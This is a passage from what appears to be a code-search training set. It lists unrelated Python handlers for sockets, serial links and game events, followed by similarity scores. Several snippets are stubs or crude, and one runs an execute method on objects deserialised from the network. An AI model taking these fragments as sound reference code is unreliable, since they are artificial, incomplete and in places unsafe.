%(buflimit))\n self.in_buffer = []\n self.in_buffer_len = 0", "def handle_read(self):\n pass", "def handle_input(self, text):\n for tsk in self.commands:\n for expr in tsk.starters:\n match_test = expr.pattern.match(text)\n if match_test:\n arg_dict = {}\n if len(match_test.groups()) == 0: # informationless command\n arg_dict = {expr.arg_names[0]: text}\n else:\n arg_dict = gen_dict(\n expr.arg_names, match_test.groups())\n self.overseer.start_process(\n tsk.name, tsk.thread_func, arg_dict)\n return\n if not self.overseer.is_running(tsk.name):\n continue\n for expr in tsk.command_patterns:\n match_test = expr.pattern.match(text)\n if match_test:\n print(\"Attempting to send command '\", text, \"' to\", tsk.name)\n if self.overseer.is_blocked(tsk.name):\n print(\"Error: blocked channel\")\n return\n arg_dict = {}\n if len(match_test.groups()) == 0: # informationless command\n arg_dict = {expr.arg_names[0]: text}\n else:\n arg_dict = gen_dict(\n expr.arg_names, match_test.groups())\n self.overseer.send_args(tsk.name, arg_dict)\n return", "def inReadEvent(self):\r\n try:\r\n self._checkAssert()\r\n if self.handshaker:\r\n self._doHandshakeOp()\r\n elif self.closer:\r\n self._doCloseOp()\r\n elif self.reader:\r\n self._doReadOp()\r\n elif self.writer:\r\n self._doWriteOp()\r\n else:\r\n self.reader = self.tlsConnection.readAsync(16384)\r\n self._doReadOp()\r\n except:\r\n self._clear()\r\n raise", "def _got_remote(self, data):\n self._recv_buffer += data", "def _handle_MonitorData (self, event, packet, reverse):\n pass", "def data_received(self, data):\n if self.session is not None:\n size = len(data)\n self.logger.debug('process_data(%r, %d)', data, size)\n self.session.process_data(data, size)", "def recvCommand(self):\n return", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n #self.logged_in = False\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096).strip()\n if received_string:\n jsonObject = json.loads(received_string)\n request = jsonObject.get('request')\n #print(received_string)\n #self.handle_data(received_string)\n if request == 'login':\n print 'logging in'\n self.login(jsonObject)\n elif request == 'logout':\n self.logout()\n elif request == 'msg':\n self.send(jsonObject)\n elif request == 'names':\n self.getNames()\n elif request == 'help':\n return \"geiegohruuhiegr\"\n else:\n return \"you suck\"\n\n else:\n print('The client is disconnected.')\n break \n # TODO: Add handling of received payload from client", "def process_sensor_params(self, data: dict):\n LOGGER.info('Receiving sensor data from TORQUE', **data)\n has_non_value_keys = any(filter(re.compile(f'.*(unit|user).*', re.IGNORECASE).match, data.keys()))\n if has_non_value_keys:\n LOGGER.info('Will ignore request since it\\'s related to sensor params')\n return\n\n user = self._resolve_user(data)\n LOGGER.info(f'Request is attached to {user.first_name} {user.last_name}', user_id=user.id)\n session = SessionController(user_id=user.id).get_or_create(data['session'])\n LOGGER.info('Resolved session to proceed', **session.to_dict())\n\n car_state = CarState.create_from_torque(self.db_session, session, data)\n if car_state:\n LOGGER.info('Created Car State', **car_state.to_dict())\n self.db_session.commit()", "def handle(self):\n req_lines = self._read_lines()\n if not req_lines:\n self.cleanup()\n for req in req_lines:\n log.debug('%s => %s', self.client, req)\n req = req.split()\n cmd = 
req.pop(0)\n try:\n self.get_command(cmd)(req)\n result = [OK]\n except Exception as error:\n result = [ERROR, error.message]\n self.send_line(' '.join(result))\n self.flush()", "def handle(self): \n \n data = self.request[0].strip()\n self.socket = self.request[1]\n\n #split off first word of file, assume is filename\n filename,sep,data = data.partition(\" \")\n\n #assume is requesting file\n if not data:\n self.sendfile(filename)\n #assume we have to save the file since data was sent\n else:\n self.savefile(filename,data)\n\n return True", "def dataReceived(self, data: bytes):\n\n if self.output:\n self.output.write(data) # redirect the message to the server", "def request_capturing(self):\n self.socket.sendall(pack('B', codes['request_pokemon']))\n self.receive_pokemon_suggestion()", "def __receive_request(self):\n # get the request's length\n request_size = self.__socket.recv(Commands.SIZE_LENGTH)\n # if the master sent an empty msg, then he has closed himself\n if not request_size:\n print \"Master Has Been Closed\"\n # TODO: close the peasant and start the run function all over again\n return False\n # fix the request's length\n request_size = int(request_size) - Commands.COMMAND_LENGTH\n # get the request's command's number\n command = int(Commands.decrypt(self.__socket.recv(Commands.COMMAND_LENGTH)))\n # if the request size's is 0, then there are not args\n args = []\n # else, there are args, read them (decrypted)\n if request_size != 0:\n args = Commands.decrypt(self.__socket.recv(request_size)).split(Commands.SEPARATE_CHAR)\n if self.__DEBUG:\n print args\n # handle the command and add the command number and return value to the responses list\n self.__responses.append(str(command) + Commands.handle_command_request(command, args))\n return True", "def _handleSensorDataAnalysis(self, data: SensorData):\n\t\tlogging.info(\"[CDA_CALLBACK]----->>>The _handleSensorDataAnalysis method is being called\")\n\t\t\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tif self.enableHandleTempChangeOnDevice and data.getSensorType() == SensorData.TEMP_SENSOR_TYPE:\n\n\t\t\tad = ActuatorData(actuatorType = ActuatorData.HVAC_ACTUATOR_TYPE)\n\t\t\tvalue = data.getValue()\n\t\t\tif value >= self.triggerHvacTempFloor and value <= self.triggerHvacTempCeiling:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_OFF)\n\t\t\telse:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_ON)\n\t\t\t\n\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\t\n\t\t\"\"\"\n\t\t\"\"\"\n\t\tif self.enableHandleSoilHumidityChangeOnDevice and data.getSensorType() == SensorData.SOIL_HUMIDITY_SENSOR_TYPE:\n\t\t\t\n\t\t\tad = ActuatorData(actuatorType = ActuatorData.SPRINKLER_ACTUATOR_TYPE)\n\t\t\tvalue = data.getValue()\n\t\t\tif value >= self.triggerWaterDeviceHumiCeiling: \n\t\t\t\tad.setCommand(ActuatorData.COMMAND_OFF)\n\t\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\telif value <= self.triggerWaterDeviceHumiFloor:\n\t\t\t\tad.setCommand(ActuatorData.COMMAND_ON)\n\t\t\t\tself.actuatorAdapterManager.sendActuatorCommand(ad)\n\t\t\t\tself.coapClient.sendGetRequest(ResourceNameEnum.CDA_ACTUATOR_CMD_RESOURCE, False, 5)\n\t\t\telse:\n\t\t\t\tself.coapClient.sendGetRequest(ResourceNameEnum.CDA_CLOUD_ACTUATOR_CMD_RESOURCE, False, 5)", "async def on_receive(self, room_id, inp_type, params):\n pass", "def process_arguments(self):\n if self.args.list_attacks:\n # User wants to see the available attacks\n self.process_attack_listing()\n else:\n # User wants to process a PCAP\n self.process_pcap()", "def handle_event(self):\n self.done = 
False\n while not self.done:\n try:\n callback_item = self.eventq.get(timeout=1)\n if callback_item == 'finish':\n print ('done')\n self.done = True\n else:\n current_ctr = callback_item\n if current_ctr > self.current_counter + 1:\n self.event('missing frames')\n self.current_counter = current_ctr + 1\n\n try:\n print ('current cntr', self.current_counter)\n pv_pairs = {}\n slice = np.array(caget(self.get_data_pv_name()))\n print ('pvname', self.get_data_pv_name())\n # read other pvs\n for pv in self.pvs:\n pv_pairs[pv] = (self.pvs[pv], caget(self.pvs[pv]))\n print ('pv pairs', pv_pairs)\n if slice is None:\n self.done = True\n self.event('reading image times out, possibly the detector exposure time is too small')\n else:\n slice.resize(self.sizex, self.sizey)\n data = ut.Data(slice, pv_pairs)\n # deliver data to monitor\n self.deliver_data(data)\n except:\n self.done = True\n self.event('reading image raises exception, possibly the detector exposure time is too small')\n except tqueue.Empty:\n continue\n\n self.finish()", "def dataReceived(self, data):\n print \"received:\", data", "def send_parameters(self, port_select, input_set, sample_rate, filter_select, corner_freq_upper, corner_freq_lower, corner_freq):\n try:\n ctrl_comm_obj.open(port_select)\n except ValueError as e:\n return False\n cnt = 0\n cursor = 0\n wait = 0\n while cnt < 3 and cursor < 5:\n if cursor == 0 and wait == 0:\n self.send_input(port_select, input_set)\n wait = 1\n elif cursor == 1 and wait == 0:\n self.send_sample_rate(port_select, sample_rate)\n wait = 1\n elif cursor == 2 and wait == 0:\n self.send_filter(port_select, filter_select)\n wait = 1\n elif cursor == 3 and wait == 0:\n self.send_corner_freq(port_select, corner_freq_upper, corner_freq_lower, corner_freq, filter_select)\n wait = 1\n elif cursor == 4 and wait == 0:\n self.send_start(port_select)\n wait = 1\n if wait == 1:\n if self.recieve_acknowlege_zybo(port_select):\n print(\"Ack received\")\n cursor += 1\n cnt = 0\n wait = 0\n else:\n pass\n else:\n cnt += 1\n if cnt < 3:\n print(\"Commands Sent/Received\")\n else:\n print(\"Commands Not Sent/Received\")\n ctrl_comm_obj.close()\n\n return True", "def process_cmd(self, cmd):\n\n resp = self.COMMANDS[cmd.cmd](cmd)\n\n logger.debug(\"Resp: %s\" % resp)\n # send to resp_queue\n # if type == G.CTRL_TYPE:\n #\n # response = json.dumps((corr_id, routing_key, resp))\n # logger.debug(\"Sending response: %s\" % response)\n # self.out_queue.put(response)\n\n response = cmd.make_response(resp)\n logger.debug(\"Sending response: %s\" % response)\n self.out_queue.put(str(response))", "def buffer_input(data, buffer, input_data):\n return weechat.WEECHAT_RC_OK", "def _handler_command_enter(self, *args, **kwargs):\n # Command device to update parameters and send a config change event.\n # Tell driver superclass to send a state change event.\n # Superclass will query the state.\n self._driver_event(DriverAsyncEvent.STATE_CHANGE)", "def do_input(self, line):\n cmd_args = io.parse_cmd_args(line, io.input_cmd_pattern)\n if cmd_args:\n success = self.manager.input(\n cmd_args.get('target'), \n cmd_args.get('cslist'), \n mode=cmd_args.get('mode')\n )\n if success:\n self.console_print(\"Yippee! input successfull!\", settings.INFO_FORMAT)\n else:\n self.console_print(\"Sorry, something kinda went wrong! 
You can try again.\", settings.ERROR_FORMAT)\n else:\n self.console_print(settings.COMMMAND_ARGS_ERROR_MSG, settings.ERROR_FORMAT)", "async def _receive_new_request(self, data):\n serializer = TextAlgorithmPromptSerializer(data=data)\n\n # don't throw exceptions in the regular pattern raise_exception=True, all\n # exceptions need to be properly handled when using channels\n valid = serializer.is_valid()\n\n if not valid:\n return await self.return_invalid_data_prompt(data)\n\n prompt_serialized = serializer.validated_data\n\n cache_key = get_cache_key_for_text_algo_parameter(**prompt_serialized)\n cached_results = await get_cached_results(cache_key)\n if cached_results:\n return await self.send_serialized_data(cached_results)\n\n # technically a bug can probably occur if separate users try the same exact\n # phrase in the 180 seconds, but if that happens, that means the servers are probably\n # crushed from too many requests anyways, RIP\n duplicate_request = await check_if_cache_key_for_parameters_is_running(\n cache_key\n )\n if duplicate_request:\n print(\"Duplicate request already running.\")\n return\n\n # if it doesnt' exist, add a state flag to say this is going to be running\n # so it will automatically broadcast back when if the frontend makes a duplicate request\n await set_request_flag_that_request_is_running_in_cache(cache_key)\n\n # switch auth styles, passing it here makes it a little bit more cross-operable\n # since aiohttp doesn't pass headers in the same way as the requests library\n # and you're too lazy to write custom middleware for one endpoint\n # the ml endpoints are protected via an api_key to prevent abuse\n prompt_serialized[\"api_key\"] = settings.ML_SERVICE_ENDPOINT_API_KEY\n\n # pass the websocket_uuid for the ML endpoints to know how to communicate\n prompt_serialized[\"websocket_uuid\"] = self.group_name\n prompt_serialized[\"cache_key\"] = cache_key\n\n model_name = prompt_serialized[\"model_name\"]\n url = get_api_endpoint_from_model_name(model_name)\n\n await self.post_to_microservice(url, prompt_serialized)", "def _handle_read(self):\n pass", "def accept_command():\n # TODO", "def _handle_received_line(self, line): # This is Propeller specific\n self._Counter += 1\n self._serialTimeout = 0\n\n msg = None\n try:\n msg = SerialMessage(data = line)\n except SerialMessageError:\n rospy.logwarn(\"Invalid line: \" + line)\n return\n\n self._SerialPublisher.publish(String(str(self._Counter) + \", in: \" + line))\n if msg.msg_class == SerialMessage.STATUS_CLASS:\n if msg.msg_type == SerialMessage.STATUS_ODOMETRY_MESSAGE:\n self._broadcast_odometry_info(msg)\n elif msg.msg_type == SerialMessage.STATUS_OP_STATE_MESSAGE:\n # The operational state message contains a lot of information, but during startup\n # only portions of it are used\n # First, the robot needs to be configured with the drive geometry and operational state\n # There is a message for drive geometry and one for operational state\n\n if not msg.drive_geometry_received:\n rospy.loginfo(\"Need to config drive geometry\")\n self._initialize_drive_geometry()\n\n elif not msg.op_state_received:\n rospy.loginfo(\"Need to config operational state\")\n self._initialize_op_state(msg)\n\n elif not self._op_state_set and msg.drive_geometry_received and msg.op_state_received:\n self._op_state_set = True\n\n elif self._op_state_set:\n self._broadcast_arlo_status(msg)\n elif msg.msg_type == SerialMessage.STATUS_US_SENSOR_MESSAGE:\n # Publish Ultrasonic data\n # Note: the mapping of sensors to higher-level 
constructs, lower deck, upper deck, front lower, back lower\n # needs to be done here as well. Maybe there should be a mapping param that gives a label to indicies, \n # e.g., \"front lower deck\" : 0 .. 4, \"rear lower deck\" : 5 .. 9, then that information could be used\n # to publish the raw sensor data into those contructs.\n self._handle_us_sensors(msg.payload)\n \n elif msg.msg_type == SerialMessage.STATUS_US_SENSOR_MESSAGE:\n # Publish Infrared data\n self._handle_ir_sensors(msg.payload)\n \n elif msg.msg_class == SerialMessage.DEBUG_CLASS:\n # Map the levels from the debug message to rospy log levels, e.g. info, warn, debug, fatal, etc\n # and then write them to rospy.logxxx.\n pass\n else:\n # Log something about this bad message\n rospy.logwarn(\"Unknown message class: \" + str(msg))", "def callback_client_receive(data):\n data: GameStateModel = JSONSerializer.deserialize(data)\n logger.debug(f\"Client received {data.__class__.__name__} object from host.\")\n # print(f\"Client received {data.__class__.__name__} object from host.\")\n if isinstance(data, GameStateModel):\n GameStateModel.set_game(data)\n return\n if isinstance(data, TurnEvent) or isinstance(data, ActionEvent):\n exec_thread = threading.Thread(target=data.execute)\n exec_thread.start()", "def callback_dat(fd_):\n # receive data\n data = os.read(fd_, 8)\n if data == '':\n return\n data, = struct.unpack('<Q', data)\n # TODO: Interpret data" ]
[ "0.61772895", "0.6057597", "0.59728074", "0.5919234", "0.57503784", "0.5750175", "0.5683027", "0.5636862", "0.5570763", "0.5540126", "0.5496406", "0.5487305", "0.54842824", "0.5481451", "0.54694", "0.54545176", "0.5411232", "0.54028386", "0.5396897", "0.53862023", "0.5382583", "0.537729", "0.53699607", "0.5359767", "0.53521496", "0.5351944", "0.53509635", "0.5343589", "0.5342194", "0.532774", "0.53239757", "0.5302966", "0.5297956", "0.52978003", "0.52972203", "0.5282272", "0.52748275", "0.5272434", "0.5267803", "0.5265094", "0.52622813", "0.52622813", "0.52605367", "0.5257414", "0.524552", "0.5232534", "0.52306247", "0.52116704", "0.5204273", "0.51955074", "0.5185503", "0.5172371", "0.5166835", "0.51632136", "0.5152194", "0.5144449", "0.5139546", "0.51388097", "0.5137107", "0.5135375", "0.5133882", "0.5132204", "0.51321375", "0.5130502", "0.5088108", "0.50866115", "0.50835305", "0.507413", "0.50715584", "0.506968", "0.5068289", "0.5058568", "0.5057683", "0.5057455", "0.5055766", "0.5053053", "0.50472105", "0.5040193", "0.5034261", "0.5031764", "0.5029566", "0.5028936", "0.50288063", "0.5028763", "0.50139064", "0.50134945", "0.50130785", "0.50123715", "0.5008258", "0.50071585", "0.50061214", "0.5005188", "0.5003882", "0.500378", "0.50031966", "0.5002159", "0.4987712", "0.49869424", "0.49824223", "0.4979812" ]
0.57042426
6
This is the method that receives the client's data and decides what to do with it. It runs in a loop so that it keeps handling incoming requests until the client sends 'quit'. If the data is 'status', the CCD status is returned. If the data is 'stop', the current exposure is stopped. Any other data is passed to handle_command() on a new thread.
async def handle_client(reader, writer): request = None # loop to continually handle incoming data while request != 'quit': request = (await reader.read(255)).decode('utf8') print(request.encode('utf8')) #log.info('COMMAND = '+request) writer.write(('COMMAND = '+request.upper()+'\n').encode('utf8')) response = 'BAD' # check if data is empty, a status query, or potential command dataDec = request if dataDec == '': break elif 'status' in dataDec.lower(): response = 'OK' # check if the command thread is running try: if exposureState() > 0: response = response + '\nBUSY' else: response = response + '\nIDLE' except: response = response + '\nIDLE' if ccd_frame[0].s == PyIndi.ISS_ON: frameType = 'LIGHT' elif ccd_frame[1].s == PyIndi.ISS_ON: frameType = 'BIAS' elif ccd_frame[2].s == PyIndi.ISS_ON: frameType = 'DARK' elif ccd_frame[3].s == PyIndi.ISS_ON: frameType = 'FLAT' response = response+\ '\nBIN MODE = '+str(ccd_bin[0].value)+'x'+str(ccd_bin[1].value)+\ '\nCCD TEMP = '+str(ccd_temp[0].value)+\ 'C\nLAST FRAME TYPE = '+str(frameType)+\ '\nFILE DIR = '+str(fileDir)+\ '\nLAST IMAGE = '+str(imgName) # send current status to open connection & log it #log.info('RESPONSE: '+response) writer.write((response+'\nDONE\n').encode('utf-8')) elif 'stop' in dataDec.lower(): # check if the command thread is running try: if comThread.is_alive(): response = 'OK: aborting exposure' ccd_abort[0].s=PyIndi.ISS_ON indiclient.sendNewSwitch(ccd_abort) blobEvent.set() #Ends the currently running thread. response = response+'\nExposure Aborted' else: response = 'OK: idle' except: response = 'OK: idle' # send current status to open connection & log it #log.info('RESPONSE = '+response) writer.write((response+'\nDONE\n').encode('utf-8')) else: # check if the command thread is running, may fail if not created yet, hence try/except try: if comThread.is_alive(): response = 'BAD: busy' # send current status to open connection & log it #log.info('RESPONSE = '+response) writer.write((response+'\nDONE\n').encode('utf-8')) else: # create a new thread for the command comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,)) comThread.start() except: # create a new thread for the command comThread = threading.Thread(target=handle_command, args=(log, writer, dataDec,)) comThread.start() await writer.drain() writer.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def handleRecvData(self, data):\n\n\t\t#Look for commands\n\t\tif data == 'Hello':\n\t\t\t#Inform client it is 'connected'\n\t\t\tself.transmit(\"Welcome\")\n\n\t\telif data == 'kill':\t\n\t\t\t#Stop the server running\n\t\t\tself.running = False\n\n\t\telif data == 'control':\n\t\t\t#Print out if in control of car\n\t\t\tprint(\"Control query\")\n\t\t\tif self.arduino:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: True\")\n\t\t\telse:\n\t\t\t\t#print(self.address)\n\t\t\t\tself.transmit(\"Control: False\")\n\n\t\telif data == 'Hello?':\n\t\t\t#The client is still alive therefore set missing count to 0\n\t\t\tself.missingCount = 0\n\n\t\t#Look for Arduino Data\n\t\telif self.arduino:\n\t\t\t#Check if controlling the car and it's a valid car command\n\t\t\tif self.arduino.readPack(data): \n\t\t\t\tprint(self.address)\n\t\t\t\tprint(\"Sent to arduino: %s\" % data)\n\t\t\telse:\n\t\t\t\t#Print out other data\n\t\t\t\tprint(\"Not valid Arduino data\")\n\t\t\t\tprint(self.address)\n\t\t\t\tprint(data)\n\n\t\telse:\n\t\t\t#All other data print out\n\t\t\tprint(self.address)\n\t\t\tprint(data)", "def handle(self):\n print \"Client %s:%s connected\" % self.client_address\n self.controller = False\n\n try:\n while not self.server.is_shutting_down.is_set():\n command = self.rfile.readline().strip()\n\n # meta commands: these control the meta operations\n # they do not drive the robot\n if not command:\n self.send_output('ok', '')\n continue\n\n if command == 'exit':\n self.send_output('ok', 'done')\n break\n\n if command == 'shutdown':\n self.send_output('ok', 'shutdown')\n self.server.shutdown()\n # the main thread will shut down the robot\n break\n\n if command == 'control':\n if self.controller:\n self.send_output('ok', 'was already a controller')\n else:\n self.controller = self.server.control_lock.acquire(blocking = 0)\n if self.controller:\n self.send_output('ok', 'acquired control lock')\n else:\n self.send_output('error', 'cannot acquire control lock')\n\n continue\n\n try:\n output = self.process_command(command)\n\n # got an invalid command (could not parse\n except CommandError, e:\n self.send_output('invalid', e.message)\n # driver rejected the command, but not due to an error\n except (drivers.common.ParameterError, drivers.common.StoppedError), e:\n self.send_output('rejected', e.message)\n # unknown error -- send error to the client, and log the exception\n except Exception, e:\n traceback.print_exc()\n self.send_output('error', str(e))\n else:\n self.send_output('ok', output)\n self.server.last_request = time.time()\n\n finally:\n output = [\"%s:%s disconnected\" % self.client_address]\n if self.controller:\n self.server.control_lock.release()\n self.server.robot.stop()\n output.append(\"; robot stopped. 
no more controlling client\")\n else:\n output.append(\"; was a viewer\")\n\n print \"\".join(output)", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n #self.logged_in = False\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096).strip()\n if received_string:\n jsonObject = json.loads(received_string)\n request = jsonObject.get('request')\n #print(received_string)\n #self.handle_data(received_string)\n if request == 'login':\n print 'logging in'\n self.login(jsonObject)\n elif request == 'logout':\n self.logout()\n elif request == 'msg':\n self.send(jsonObject)\n elif request == 'names':\n self.getNames()\n elif request == 'help':\n return \"geiegohruuhiegr\"\n else:\n return \"you suck\"\n\n else:\n print('The client is disconnected.')\n break \n # TODO: Add handling of received payload from client", "def run(self):\n self._create_command_socket()\n\n self._is_running = True\n\n # self._clear_buffer(data_socket)\n\n # prevent recv from block indefinitely\n self._socket.settimeout(DataThread.TIMEOUT)\n\n while self._is_running:\n try:\n data = self._socket.recv(SIZE_BUFFER)\n if len(data):\n self._adapter.process_message(data)\n except (KeyboardInterrupt, SystemExit, OSError):\n print('Exiting data socket')\n\n except socket.timeout:\n print('NatNetClient command socket timeout!')\n continue\n\n self._close_socket()", "def run(self):\n print('ClientThread[{}] is running!'.format(self.threadID))\n while True:\n request = self.receive()\n try:\n requestcode = request.split(',')[0]\n if requestcode == 'SYNCFROM':\n self.syncToClient()\n continue\n elif requestcode == 'SYNCTO':\n self.syncFromClient()\n continue\n elif requestcode == 'GETINDEX':\n self.sendIndex()\n continue\n elif requestcode == 'CLOSE':\n print('Connection to {}:{} closed'.format(self.ip,self.port))\n self.tcpsock.close()\n break\n elif not request:\n continue\n else:\n print(request, type(request))\n raise Exception('Unexpected bytes from client.')\n except KeyboardInterrupt:\n sys.exit()\n except Exception as err:\n traceback.print_exc()\n continue\n self.tcpsock.close()\n print('ClientThread[{}] exiting..'.format(self.threadID))", "def run(self):\n\n try:\n while True:\n self.log.info(\"Waiting for a connection...\")\n self.mc.events.post('client_disconnected')\n self.connection, client_address = self.socket.accept()\n\n self.log.info(\"Received connection from: %s:%s\",\n client_address[0], client_address[1])\n self.mc.events.post('client_connected',\n address=client_address[0],\n port=client_address[1])\n\n # Receive the data in small chunks and retransmit it\n while True:\n try:\n data = self.connection.recv(4096)\n if data:\n commands = data.split(\"\\n\")\n for cmd in commands:\n if cmd:\n self.process_received_message(cmd)\n else:\n # no more data\n break\n\n except:\n if self.mc.config['mediacontroller']['exit_on_disconnect']:\n self.mc.shutdown()\n else:\n break\n\n except Exception:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n lines = traceback.format_exception(exc_type, exc_value, exc_traceback)\n msg = ''.join(line for line in lines)\n self.mc.crash_queue.put(msg)", "def run(self):\n # pylint: disable=unused-variable\n try:\n LOGGER.debug(\"starting session from client %s\",\n str(self._client_address))\n self._data_handler.on_start(self)\n read_list = [self._sock]\n\n self._state.transit(sitcpy.THREAD_RUNNING)\n while self._state() == sitcpy.THREAD_RUNNING:\n 
try:\n readable, _, _ = select.select(read_list, [], [], 0.1)\n if self._sock in readable:\n\n # Receive data.\n byte_data = self._sock.recv(self._max_buff)\n if not byte_data:\n LOGGER.error(\"readable socket with no data. closing session\")\n break\n byte_data = self._rest_byte_data + byte_data if self._rest_byte_data else byte_data\n\n # Find delimiter position\n delimiter_pos = self._data_handler.find_delimiter_position(byte_data)\n\n if delimiter_pos >= 0:\n # If delimiter found.\n if not self._data_handler.on_data(self, byte_data[:delimiter_pos]):\n break\n self._rest_byte_data = byte_data[delimiter_pos:]\n else:\n # If delimiter not found.\n self._rest_byte_data = byte_data\n\n self._data_handler.on_idle(self)\n except Exception as exc:\n LOGGER.error(\"Exception at SessionThread.run : %s\", str(exc))\n raise\n del read_list[:]\n finally:\n self.close()\n self._state.transit(sitcpy.THREAD_STOPPED)", "def main(self):\n while True:\n if not self.data_server_command.empty():\n command_data_server = self.data_server_command.get()\n if command_data_server[0] == 4:\n thread.start_new_thread(self.get_file, (command_data_server[1],))\n else:\n self.data_server_command_def[command_data_server[0]](command_data_server[1])", "def run(self):\n\n\t\t#Begin running the clientHandler\n\t\tself.running = True\n\t\tself.rxThread.start()\n\n\t\twhile self.running:\n\t\t\ttime.sleep(0.1)\n\t\n\t\t\t#Keep a count of the number of missing Hello requests, over 5 kill client\n\t\t\tif self.missingCount >= 5:\n\t\t\t\tself.running = False", "def handle(self):\n self.ip = self.client_address[0]\n self.port = self.client_address[1]\n self.connection = self.request\n\n state.addConnection(self.connection)\n\n # Loop that listens for messages from the client\n while True:\n received_string = self.connection.recv(4096)\n\n if len(received_string) == 0:\n continue\n\n # TODO: Add handling of received payload from client\n\n # Convert payload from JSON to object\n payloadToData = json.loads(received_string)\n\n # determine what request is being made\n request_handler = RequestHandler(payloadToData,\n state,\n self.connection)\n\n # execute and generate response (JSON formatted)\n jsonResponse = request_handler.callHandler()\n\n if not jsonResponse == 'BROADCAST':\n # send response\n self.connection.send(bytes(jsonResponse, \"ascii\"))", "def _dispatch_from_client_request(self):\n # Listen for client connection\n self._from_client_request.listen()\n\n while not self._exit_request:\n readable, _, _ = select([self._from_client_request], [], [self._from_client_request], 0.1)\n\n if readable:\n client_conn, client_addr = readable[0].accept()\n client_conn.setblocking(False)\n\n client_name_read, _, _ = select([client_conn], [], [client_conn])\n if client_name_read:\n client_name = json.loads(client_name_read[0].recv(cfg.HEADER).decode('utf-8'))\n else:\n print(\"Connection closed\")\n continue\n\n self._thread_lock.acquire()\n self._from_client_connections[client_conn] = client_name\n self._state[client_name] = 0\n self._thread_lock.release()\n\n print(\"Receiving commands from [\" + client_name + \", \" + client_addr[0] + \", \" + str(client_addr[1]) + ']')", "def run(self):\n self._create_data_socket()\n\n self._is_running = True\n\n # self._clear_buffer(data_socket)\n\n # prevent recv from block indefinitely\n self._socket.settimeout(DataThread.TIMEOUT)\n\n while self._is_running:\n try:\n data = self._socket.recv(SIZE_BUFFER)\n if len(data):\n self._adapter.process_message(data)\n except (KeyboardInterrupt, 
SystemExit, OSError):\n print('Exiting data socket')\n\n except socket.timeout:\n print('NatNetClient data socket timeout!')\n continue\n\n self._close_socket()", "def receive_data_from_server(self):\n while not self._stop_receive.is_set():\n # seems irrelevant now\n # if not self._pause_receive.is_set():\n try:\n # We are doing handshaking, so this is fine\n _server_reply = self.receive(True)\n if _server_reply:\n self._reply_queue.append(_server_reply)\n self.callback_client_receive(_server_reply)\n except MastermindErrorClient:\n logger.error(\"Mastermind Error:\")\n info = sys.exc_info()\n traceback.print_exception(*info)\n self.callback_disconnect()\n except OSError:\n logger.warning(\"OS ERROR, disconnecting client.\")\n info = sys.exc_info()\n traceback.print_exception(*info)\n self.callback_disconnect()", "def process(self):\n try:\n (data, peer) = self._socket.recvfrom(1024)\n request = json.loads(data.decode())\n command = request['command']\n method = getattr(self, 'do_' + command)\n try:\n result = method(request)\n if result is not None:\n self._send_response(result, peer)\n except KeyError as exc:\n self._logger.error(\n \"missing parameter for command '%s': '%s'\",\n command, exc.args[0]\n )\n except ValueError:\n self._logger.error(\"invalid control request received\")\n except KeyError:\n self._logger.error(\"no control command specified\")\n except AttributeError:\n self._logger.error(\"unknown control command '%s'\", command)\n return []", "def listen(self):\n self.logger.info(\"Control server: {}\".format(self.server_bind_addr))\n while True:\n try:\n msg = self.ctrl_sock.recv_json()\n reply = self.handle_msg(msg)\n self.logger.debug(\"Sending: {}\".format(reply))\n self.ctrl_sock.send_json(reply)\n except JSONDecodeError:\n err_msg = \"Not a JSON message!\"\n self.logger.warning(err_msg)\n self.ctrl_sock.send_json(msgs.error(err_msg))\n except KeyboardInterrupt:\n self.logger.info(\"Exiting control server. Bye!\")\n self.clean_up()\n sys.exit(0)", "def run(self):\n patterns = self.conn.dispatch_patterns()\n\n while not self.disconnect.is_set():\n try:\n data = self.conn.get_data() # returns empty string if times out\n if data:\n self.conn.dispatch_data(data, patterns)\n\n command = self.command_queue.get_nowait()\n self.process_command(command)\n except DisconnectedException:\n self.logger.info('Disconnected from server. 
Reconnecting.')\n self.conn.close()\n self.connect_and_join_channels(self.channels)\n continue\n except Queue.Empty:\n continue", "def enter_read_loop(self):\n\n try:\n while True:\n try:\n request = DAPBaseMessage.recv(self._current_client)\n except Exception as e:\n # TODO send error\n traceback.print_exc()\n continue\n\n if request is None:\n # client terminated without termination request\n return\n try:\n self.resolve_message(request)\n except Exception as e:\n # TODO send error\n traceback.print_exc()\n self.next_seq += 1\n DAPErrorResponse.create(self.next_seq, rq.seq, False, message=\"Error\").send(self._current_client)\n continue\n\n if self._current_client is None:\n self._ready_for_events = False\n return # terminated\n\n except BaseException as e:\n # failure while communicating\n traceback.print_exc()\n pass\n finally:\n # final handler, clear active client\n self._current_client = None\n self._ready_for_events = False\n\n debugger.reset()", "def run(self):\n os.chdir(ServerFolder)\n while True:\n request = self.client_socket.recv(1024).decode().strip()\n if not request:\n print(\"Disconnecting from client {}:{}\".format(\n self.client_ip, self.client_port))\n self.client_socket.shutdown(socket.SHUT_RDWR)\n self.client_socket.close()\n break\n request = request.split(\",\")\n\n if request[0] == \"LS\":\n self.ls()\n elif request[0] == \"PWD\":\n self.pwd()\n elif request[0] == \"CD\":\n self.cd(request[1])\n elif request[0] == \"MKDIR\":\n self.mkdir(request[1])\n elif request[0] == \"RMDIR\":\n self.rmdir(request[1])\n elif request[0] == \"RM\":\n self.rm(request[1])\n\n elif request[0] == \"rget\" and len(request[1:]) == 1:\n self.send_file(*request[1:])\n\n elif request[0] == \"rput\" and len(request[1:]) == 2:\n self.receive_file(*request[1:])", "def start(self) -> None:\n data = b\"\"\n while True:\n # while loop to get size of receiving data\n while len(data) < self.payload_size:\n packet = self.client_socket.recv(4 * 1024) # 4KB\n if not packet:\n break\n data += packet\n # counting size of sending data\n packed_msg_size = data[: self.payload_size]\n # if in first while loop there was download part of data, need to add it on start\n data = 